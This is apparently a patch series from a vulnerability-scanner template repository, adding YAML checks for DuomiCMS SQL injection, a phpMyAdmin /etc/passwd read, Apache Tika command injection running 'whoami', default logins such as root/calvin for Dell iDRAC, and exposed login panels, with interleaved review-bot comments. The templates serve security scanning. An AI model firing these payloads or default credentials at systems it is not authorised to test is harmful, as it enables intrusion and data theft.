@@ -0,0 +1,26 @@ +id: duomicms-sql-injection + +info: + name: DuomiCMS SQL Injection + author: pikpikcu + severity: high + refrence: https://redn3ck.github.io/2016/11/01/duomiCMS/ + tags: duomicms,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))" + + matchers-condition: and + matchers: + + - type: word + words: + - "e0ec043b3f9e198ec09041687e4d4e8d" + part: body + condition: and + + - type: status + status: + - 200 From f4e8e558a5230c20cda61b95cb162b7cc37b2f94 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Fri, 26 Feb 2021 12:49:47 -0300 Subject: [PATCH 068/370] Create moodle-changelog.yaml --- miscellaneous/moodle-changelog.yaml | 30 +++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 miscellaneous/moodle-changelog.yaml diff --git a/miscellaneous/moodle-changelog.yaml b/miscellaneous/moodle-changelog.yaml new file mode 100644 index 0000000000..cfeb24ab23 --- /dev/null +++ b/miscellaneous/moodle-changelog.yaml @@ -0,0 +1,30 @@ +id: moodle-changelog-file + +info: + name: Moodle Changelog File + author: oppsec + severity: info + description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version. + +requests: + - method: GET + path: + - "{{BaseURL}}/lib/upgrade.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "This files describes API changes in core libraries and APIs," + - "information provided here is intended especially for developers." + - "new my moodle and profiles API" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From 0723b219639126a779ba4fdd757ff28494b15bab Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran Date: Fri, 26 Feb 2021 23:56:21 +0530 Subject: [PATCH 069/370] Create phpmyadmin-wooYun.yaml --- misconfiguration/phpmyadmin-wooYun.yaml | 32 +++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 misconfiguration/phpmyadmin-wooYun.yaml diff --git a/misconfiguration/phpmyadmin-wooYun.yaml b/misconfiguration/phpmyadmin-wooYun.yaml new file mode 100644 index 0000000000..52fa01a388 --- /dev/null +++ b/misconfiguration/phpmyadmin-wooYun.yaml @@ -0,0 +1,32 @@ +id: phpmyadmin-wooYun + +info: + name: phpMyAdmin-WooYun + author: dhiyaneshDK + severity: high + reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ + tags: cve,phpmyadmin,lfi +requests: + - raw: + - | + POST /scripts/setup.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 82 + + + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" From 2a0d868ce8cdd34186f911f8410ff7ced3bf2cfb Mon Sep 17 00:00:00 2001 
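Review bot: `tags: cve,phpmyadmin,lfi` tags the template as a CVE although the id and reference point at a WooYun advisory (WooYun-2016-199433) and no CVE number is given; drop `cve` from the tags, or add the CVE id to `reference` if one exists. The raw request hard-codes `Content-Length: 82` while the body line `action=test&configuration=...` is 80 bytes, and two blank lines separate headers from body, so the number only works out if the extra blank line is counted as body; nuclei recomputes the length for non-unsafe raw requests as far as I know, but the header is misleading and should go, together with one of the blank lines. The regex matcher has no `part:`; body is the default, but `part: body` makes the intent explicit next to the status matcher.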
From: Kophjager007 Date: Fri, 26 Feb 2021 12:49:21 -0600 Subject: [PATCH 070/370] Updated and added Dell iDRAC files --- .../dell/dell-idrac-default-login.yaml | 4 +-- .../dell/dell-idrac9-default-login.yaml | 30 +++++++++++++++++++ technologies/dell/dell-idrac6-detect.yaml | 29 ++++++++++++++++++ technologies/dell/dell-idrac7-detect.yaml | 29 ++++++++++++++++++ technologies/dell/dell-idrac8-detect.yaml | 29 ++++++++++++++++++ .../dell-idrac9-detect.yaml} | 22 +++++--------- workflows/dell-idrac-workflow.yaml | 9 ++++-- 7 files changed, 132 insertions(+), 20 deletions(-) create mode 100644 default-logins/dell/dell-idrac9-default-login.yaml create mode 100644 technologies/dell/dell-idrac6-detect.yaml create mode 100644 technologies/dell/dell-idrac7-detect.yaml create mode 100644 technologies/dell/dell-idrac8-detect.yaml rename technologies/{dell-idrac-detect.yaml => dell/dell-idrac9-detect.yaml} (64%) diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index f0e9139351..b34153e775 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -1,6 +1,6 @@ id: dell-idrac-default-login info: - name: Dll iDRAC Default login + name: Dell iDRAC6/7/8 Default login author: kophjager007 severity: high tags: dell,idrac,dlogin @@ -24,4 +24,4 @@ requests: - type: word words: - - 0 \ No newline at end of file + - 0 diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml new file mode 100644 index 0000000000..57d24e87da --- /dev/null +++ b/default-logins/dell/dell-idrac9-default-login.yaml 
@@ -0,0 +1,30 @@
+id: dell-idrac9-default-login
+info:
+ name: Dell iDRAC9 Default login
+ author: kophjager007
+ severity: high
+ tags: dell,idrac,dlogin
+
+requests:
+ - method: POST
+ cookie-reuse: true
+ path:
+ - "{{BaseURL}}/sysmgmt/2015/bmc/session"
+ body: " user=root&password=calvin"
+ headers:
+ Host: "{{Hostname}}"
+ Accept: "application/json, text/plain, */*"
+ user: "root"
+ password: "calvin"
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+ Referer: "{{BaseURL}}/login.html"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - '"authResult":0'
diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml
new file mode 100644
index 0000000000..fa7f636dfb
--- /dev/null
+++ b/technologies/dell/dell-idrac6-detect.yaml
@@ -0,0 +1,29 @@
+id: dell-idrac6-detect
+info:
+ name: Detect Dell iDRAC6
+ author: kophjager007
+ description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
+ severity: info
+
+requests:
+ - method: GET
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+ path:
+ - "{{BaseURL}}/data?get=prodServerGen"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "11G"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - '[0-9]{2}G'
\ No newline at end of file
diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml
new file mode 100644
index 0000000000..f11ad8b32e
--- /dev/null
+++ b/technologies/dell/dell-idrac7-detect.yaml
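Review bot: `body: " user=root&password=calvin"` carries a leading space inside the quotes, so a form parser would see the key as ` user` rather than `user`; because the same credentials are also sent as the `user`/`password` headers, the login presumably succeeds through the headers and the body is dead weight, but either way the intended value is `body: "user=root&password=calvin"`. The explicit `Host: "{{Hostname}}"` header duplicates what nuclei derives from the target, and `cookie-reuse: true` appears to have no effect on a single-request template; both can go.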
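Review bot: The word matcher accepts any 200 response whose body happens to contain the token `11G`, with nothing tying the reply to iDRAC, and the same request, extractor and bare-token match are repeated in dell-idrac7-detect (`12G`) and dell-idrac8-detect (`13G`) on L60, while the renamed dell-idrac9-detect on L61 loosens it further with `part: all` and `14G`. If `/data?get=prodServerGen` echoes the element name in its reply, add a second word matcher on `prodServerGen` so the generation string is only accepted in that context; otherwise a regex with word boundaries (`'\b11G\b'`) at least limits incidental hits. Since the three iDRAC6/7/8 templates differ only in that string and the `[0-9]{2}G` extractor already captures it, one detect template would also spare the workflow in patch 098 (L80) from issuing the identical request three times per host. None of the four detect templates carries a `tags:` entry.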
@@ -0,0 +1,29 @@ +id: dell-idrac7-detect +info: + name: Detect Dell iDRAC7 + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/data?get=prodServerGen" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "12G" + + extractors: + - type: regex + part: body + regex: + - '[0-9]{2}G' \ No newline at end of file diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml new file mode 100644 index 0000000000..bc21d228dd --- /dev/null +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -0,0 +1,29 @@ +id: dell-idrac8-detect +info: + name: Detect Dell iDRAC8 + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/data?get=prodServerGen" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "13G" + + extractors: + - type: regex + part: body + regex: + - '[0-9]{2}G' \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml similarity index 64% rename from technologies/dell-idrac-detect.yaml rename to technologies/dell/dell-idrac9-detect.yaml index 8e86f218e7..94265b4d98 100644 
--- a/technologies/dell-idrac-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,6 +1,6 @@ -id: dell-idrac-detect +id: dell-idrac9-detect info: - name: Detect Dell iDRAC + name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info @@ -10,9 +10,8 @@ requests: headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - - "{{BaseURL}}/restgui/start.html" - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - - "{{BaseURL}}/login.html" + # iDRAC9 has a different endpoint than 8 and below. matchers-condition: and matchers: @@ -20,25 +19,18 @@ requests: status: - 200 - type: word - part: body + part: all words: - - "Dell Integrated Remote Access Controller " - - "Integrated Dell Remote Access Controller" - - "iDRAC" - - "PowerEdge" + - "14G" extractors: - - type: regex - part: header - regex: - - iDRAC/[0-9]{1,2} - type: regex part: body regex: - - iDRAC[0-9]{1,2} + - '[0-9]{2}G' - type: regex part: body name: fwver group: 1 regex: - - '"FwVer" *: *"([^"]+)"' \ No newline at end of file + - '"FwVer" *: *"([^"]+)"' diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index fef179d8a6..aa6d7cc29a 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml 
@@ -6,6 +6,9 @@ info: tags: workflow workflows: - - template: technologies/dell-idrac-detect.yaml - subtemplates: - - template: default-logins/dell/dell-idrac-default-login.yaml \ No newline at end of file + - template: technologies/dell/dell-idrac6-detect.yaml + - template: technologies/dell/dell-idrac7-detect.yaml + - template: technologies/dell/dell-idrac8-detect.yaml + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac9-detect.yaml + - template: default-logins/dell/dell-idrac9-default-login.yaml From 5776c47894d397c13bbe7ccb6d2846fb11dbda14 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 20:03:32 +0000 Subject: [PATCH 071/370] Create axis2-default-password.yaml --- .../axis2/axis2-default-password.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/axis2/axis2-default-password.yaml diff --git a/default-logins/axis2/axis2-default-password.yaml b/default-logins/axis2/axis2-default-password.yaml new file mode 100644 index 0000000000..8ea5dd0653 --- /dev/null +++ b/default-logins/axis2/axis2-default-password.yaml @@ -0,0 +1,27 @@ +id: axis2-default-password + +info: + name: Axis2 Default Password + author: pikpikcu + severity: high + tags: axis,apache,dlogin + +requests: + - method: POST + path: + - "{{BaseURL}}/axis2-admin/login" + - "{{BaseURL}}/axis2/axis2-admin/login" + headers: + Content-Type: application/x-www-form-urlencoded + body: "userName=admin&password=axis2&submit=+Login+" + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 From 0bdb8d0d32d80d5925bc272abd0dbfe0cfcd5863 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 03:18:29 +0000 Subject: [PATCH 072/370] Create CVE-2018-1335.yaml --- cves/2018/CVE-2018-1335.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2018/CVE-2018-1335.yaml diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml new file mode 100644 index 0000000000..0eabe5183d --- /dev/null +++ b/cves/2018/CVE-2018-1335.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-1335 + +info: + name: Apache Tika 1.15-1.17 Header Command Injection + author: pikpikcu + severity: critical + reference: https://www.exploit-db.com/exploits/47208 + tags: cve,cve2018,apache,tika,rce + +requests: + - method: PUT + path: + - "{{BaseURL}}/meta" + headers: + X-Tika-OCRTesseractPath: cscript + X-Tika-OCRLanguage: //E:Jscript + Expect: 100-continue + Content-type: image/jp2 + Connection: close + body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/csv" + part: header + + - type: word + words: + - "org.apache.tika.parser.DefaultParser" + - "org.apache.tika.parser.gdal.GDALParse" + part: body + condition: and + + - type: status + status: + - 200 From 237f58f3f0b1bd95719ec9d31ad4a815dd534fc7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 14:46:19 +0700 Subject: [PATCH 073/370] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index bfc8c55cd2..1dd783b000 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml 
@@ -20,6 +20,9 @@ requests: - "{{BaseURL}}/phpversion.php" - "{{BaseURL}}/time.php" - "{{BaseURL}}/index.php" + - "{{BaseURL}}/temp.php" + - "{{BaseURL}}/PHPInfo.php" + - "{{BaseURL}}/old_phpinfo.php" matchers: - type: word words: From 8c903d9b7e12caeb88ed4f0d6f85e32d5923a307 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:08:26 +0000 Subject: [PATCH 074/370] Auto Update README [Sat Feb 27 08:08:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 91686dc216..86f6f6b3dc 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | -| workflows | 22 | miscellaneous | 15 | default-logins | 12 | +| workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 612 files**. +**63 directories, 613 files**. From 96d00013d9753a82130cb61db0e61873b4235e16 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:40:44 +0000 Subject: [PATCH 075/370] Auto Update README [Sat Feb 27 08:40:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 86f6f6b3dc..060d20910f 100644 --- a/README.md +++ b/README.md 
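Review bot: The three added paths keep growing a list that is requested in full against every host even after an earlier candidate already matched; if the nuclei version in use supports it, `stop-at-first-match: true` on this request entry (next to `path:`) caps the redundant requests, and the `/PHPInfo.php` variant only pays off on case-sensitive hosts. The enclosing request entry and its `matchers` start and end outside the hunk.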
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | | workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 613 files**. +**63 directories, 614 files**. From 57d8fa0067d333908b3695b478cb16e6530bdbe6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:43:12 +0000 Subject: [PATCH 076/370] Auto Update README [Sat Feb 27 08:43:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 060d20910f..6231a04a74 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 102 | exposed-panels | 74 | +| cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | | workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 614 files**. +**63 directories, 615 files**. From bf798cda414e024e5848d771c6e7550fd8a8949f Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 14:21:07 +0530 Subject: [PATCH 077/370] Update phpmyadmin-wooYun.yaml --- misconfiguration/phpmyadmin-wooYun.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/misconfiguration/phpmyadmin-wooYun.yaml b/misconfiguration/phpmyadmin-wooYun.yaml index 52fa01a388..66767bbddb 100644 --- a/misconfiguration/phpmyadmin-wooYun.yaml +++ b/misconfiguration/phpmyadmin-wooYun.yaml @@ -1,11 +1,11 @@ -id: phpmyadmin-wooYun +id: phpmyadmin-wooyun info: name: phpMyAdmin-WooYun author: dhiyaneshDK severity: high reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ - tags: cve,phpmyadmin,lfi + tags: phpmyadmin,lfi requests: - raw: - | @@ -19,7 +19,6 @@ requests: Content-Type: application/x-www-form-urlencoded Content-Length: 82 - action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} matchers-condition: and From adc3ab0a082c2551d3d355b51c93340164309987 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:52:01 +0000 Subject: [PATCH 078/370] Auto Update README [Sat Feb 27 08:52:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6231a04a74..da7b9d286e 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | -| exposures | 55 | technologies | 48 | misconfiguration | 48 | +| exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 615 files**. +**63 directories, 616 files**. From 0f27d7767240f2a2d6d4144204f3f316f8c2d2a4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 09:36:07 +0000 Subject: [PATCH 079/370] Auto Update README [Sat Feb 27 09:36:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index da7b9d286e..fb66e7e1ee 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 22 | miscellaneous | 16 | default-logins | 12 | +| workflows | 22 | miscellaneous | 16 | default-logins | 13 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 616 files**. +**64 directories, 617 files**. From b57214bebe72d37ad43429f50e2b222c9c027540 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 15:16:22 +0530 Subject: [PATCH 080/370] Update micro-focus-ucmdb-default-credentials.yaml --- default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml index 23d8dccad0..25a7fe3f8e 100644 --- a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml +++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml @@ -10,7 +10,6 @@ requests: - method: POST path: - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;" - - "{{BaseURL}}:8443/ucmdb-ui/cms/loginRequest.do;" body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB" matchers-condition: and matchers: From e53752f7d5daadb4f2303bf7848f9bf18acbaed3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 09:50:46 +0000 Subject: [PATCH 081/370] Auto Update README [Sat Feb 27 09:50:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fb66e7e1ee..6303977ebb 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 22 | miscellaneous | 16 | default-logins | 13 | +| workflows | 22 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**64 directories, 617 files**. +**65 directories, 618 files**. From 7d96e1b78537795913ddad9aa35a2fdbe57b8939 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 15:33:13 +0530 Subject: [PATCH 082/370] Update CVE-2020-11853.yaml --- cves/2020/CVE-2020-11853.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml index 8e683f847a..8e2f1ce615 100644 --- a/cves/2020/CVE-2020-11853.yaml +++ b/cves/2020/CVE-2020-11853.yaml @@ -19,7 +19,6 @@ requests: - method: GET path: - "{{BaseURL}}/ucmdb-api/connect" - - "{{BaseURL}}:8443/ucmdb-api/connect" matchers-condition: and matchers: - type: status From 844de61c1ff8964f97740b9499a78ba9bdaf78b2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 15:36:45 +0530 Subject: [PATCH 083/370] Update CVE-2020-11854.yaml --- cves/2020/CVE-2020-11854.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index 2cc61de29d..0f5f1bf477 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ b/cves/2020/CVE-2020-11854.yaml @@ -19,7 +19,6 @@ requests: - method: GET path: - "{{BaseURL}}/ucmdb-api/connect" - - "{{BaseURL}}:8443/ucmdb-api/connect" matchers-condition: and matchers: - type: status From fb53dc0d2c28a5545819aa22d1c2f7c2f564bf49 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:57:13 +0530 Subject: [PATCH 084/370] Create d-link-wireless.yaml --- exposed-panels/d-link-wireless.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/d-link-wireless.yaml diff --git a/exposed-panels/d-link-wireless.yaml b/exposed-panels/d-link-wireless.yaml new file mode 100644 index 0000000000..9a339ffa48 --- /dev/null +++ b/exposed-panels/d-link-wireless.yaml 
@@ -0,0 +1,22 @@ +id: dlink-wireless + +info: + name: D-Link Wireless Router Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6784 + +requests: + - method: GET + path: + - '{{BaseURL}}/status.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME' + - 'D-LINK SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME' + - type: status + status: + - 200 From 13024532d8d4fa6300c932059466171721f0edcd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:57:57 +0530 Subject: [PATCH 085/370] Create microsoft-exchange-login.yaml --- exposed-panels/microsoft-exchange-login.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/microsoft-exchange-login.yaml diff --git a/exposed-panels/microsoft-exchange-login.yaml b/exposed-panels/microsoft-exchange-login.yaml new file mode 100644 index 0000000000..e6e6ad8092 --- /dev/null +++ b/exposed-panels/microsoft-exchange-login.yaml @@ -0,0 +1,22 @@ +id: exchange-login + +info: + name: Microsoft Exchange login page + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6739 + +requests: + - method: GET + path: + - '{{BaseURL}}/owa/auth/logon.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Exchange Log In' + - 'Microsoft Exchange - Outlook Web Access' + - type: status + status: + - 200 From dad752f600f74fd5a57f53e317848d8e46fc2092 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:58:22 +0530 Subject: [PATCH 086/370] Create jfrog.yaml --- exposed-panels/jfrog.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/jfrog.yaml diff --git a/exposed-panels/jfrog.yaml b/exposed-panels/jfrog.yaml new file mode 100644 index 0000000000..85b4ebc8e4 --- /dev/null +++ b/exposed-panels/jfrog.yaml 
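Review bot: None of the exposed-panels templates added in patches 084–089 (L73–L75) and 100 (L81) carries a `tags:` entry, whereas the default-login and CVE templates on this page do, so these cannot be selected or excluded by tag; add e.g. `tags: panel` under `info` in each (the default-login templates here use `dlogin` for the same purpose). In this d-link template the two `words` rely on the matcher's default `or` condition, which is presumably intended for the router and access-point variants, but spelling out `condition: or` keeps a reader from assuming both must be present.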
@@ -0,0 +1,21 @@ +id: jfrog-login + +info: + name: JFrog Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6797 + +requests: + - method: GET + path: + - '{{BaseURL}}/ui/login/' + + matchers-condition: and + matchers: + - type: word + words: + - 'JFrog' + - type: status + status: + - 200 From 437545c104ac5bb824d4baa681b17370fba0d5db Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:59:05 +0530 Subject: [PATCH 087/370] Create powerlogic-ion.yaml --- exposed-panels/powerlogic-ion.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/powerlogic-ion.yaml diff --git a/exposed-panels/powerlogic-ion.yaml b/exposed-panels/powerlogic-ion.yaml new file mode 100644 index 0000000000..407b1c3baa --- /dev/null +++ b/exposed-panels/powerlogic-ion.yaml @@ -0,0 +1,21 @@ +id: powerlogic-ion + +info: + name: PowerLogic ION Exposed + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/6810 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'PowerLogic ION' + - type: status + status: + - 200 From cd3c84cdf826ae4908cca8766d6154e809a81f65 Mon Sep 17 00:00:00 2001 From: 